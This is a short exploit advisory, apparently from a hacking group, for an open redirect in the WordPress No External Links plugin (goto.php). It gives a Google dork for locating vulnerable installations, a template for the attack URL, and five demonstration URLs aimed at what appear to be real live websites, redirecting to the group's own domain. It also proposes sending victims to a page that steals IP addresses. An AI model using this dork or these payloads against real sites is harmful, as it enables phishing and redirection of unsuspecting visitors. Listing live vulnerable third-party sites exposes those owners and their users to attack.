[^][^][^][^][^][^][^][^][^][^][^]
[^] Exploit Title : Wordpress No External links Plugin Open Redirect
[^] Exploit Author : Ashiyane Digital Security Team
[^] Vendor Homepage : https://wordpress.org/plugins/wp-noexternallinks/
[^] Google Dork : "inurl:wp-content/plugins/wp-noexternallinks/goto.php"
[^] Version : 2.7.1 & 2.6.3
[^] Date: 13 Jan 2016
[^] Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Vulnerable PHP File = wp-noexternallinks/goto.php
[^] Vulnerable Parameter = Get Method
[^] By using this vulnerability you can redirect your victim to any
page you want. For example redirect somebody to a malicious php code
which steals IP address.
[^]
[^] Attack Like :
site.com/wp-content/plugins/wp-noexternallinks/goto.php?google.com
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Demos :
[^]
[^]
http://prazhanka.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org
[^]
[^]
http://dance-code.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org
[^]
[^]
http://realix.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org
[^]
[^]
http://headz.fm/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org
[^]
[^]
http://stupnitskaya.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org
[^]
[^][^][^][^][^][^][^][^][^][^][^]
[^] Discovered by : Ac!D
[^] tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for
vendetta , Sh.Cloner & Hassan
[^][^][^][^][^][^][^][^][^][^][^]